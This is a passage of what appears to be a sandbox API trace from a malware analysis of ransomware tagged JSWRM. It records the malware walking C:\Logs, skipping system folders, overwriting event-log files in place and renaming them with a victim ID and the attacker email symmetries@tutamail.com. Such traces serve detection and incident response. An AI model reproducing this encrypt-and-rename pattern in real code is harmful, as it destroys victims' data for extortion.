lpWideCharStr="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchWideChar=63, lpMultiByteStr=0x20de78, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpUsedDefaultChar=0x0) returned 63 [0065.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchWideChar=63, lpMultiByteStr=0x20e268, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpUsedDefaultChar=0x0) returned 63 [0065.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0065.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0065.420] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.420] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.420] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.420] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.426] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.426] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.426] CloseHandle (hObject=0x450) returned 1 [0065.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0065.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0065.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0065.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0065.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.429] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0065.429] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2=".") returned 1 [0065.429] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="..") returned 1 [0065.429] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="...") returned 1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="windows") returned -1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="recovery") returned -1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="perflogs") returned -1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="documents and settings") returned 1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="system volume information") returned -1 [0065.430] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="msocache") returned -1 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0065.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchWideChar=49, lpMultiByteStr=0x20e268, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0065.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0065.430] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.430] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.430] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.430] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.436] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.436] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.436] CloseHandle (hObject=0x450) returned 1 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0065.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0065.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.457] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0065.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0065.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.458] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2=".") returned 1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="..") returned 1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="...") returned 1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="windows") returned -1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="recovery") returned -1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="perflogs") returned -1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="system volume information") returned -1 [0065.458] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="msocache") returned -1 [0065.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0065.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x20e418, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0065.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x20de78, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0065.459] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.462] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.462] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.463] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.469] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.469] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.469] CloseHandle (hObject=0x450) returned 1 [0065.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0065.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0065.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0065.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0065.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0065.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.472] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.473] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, 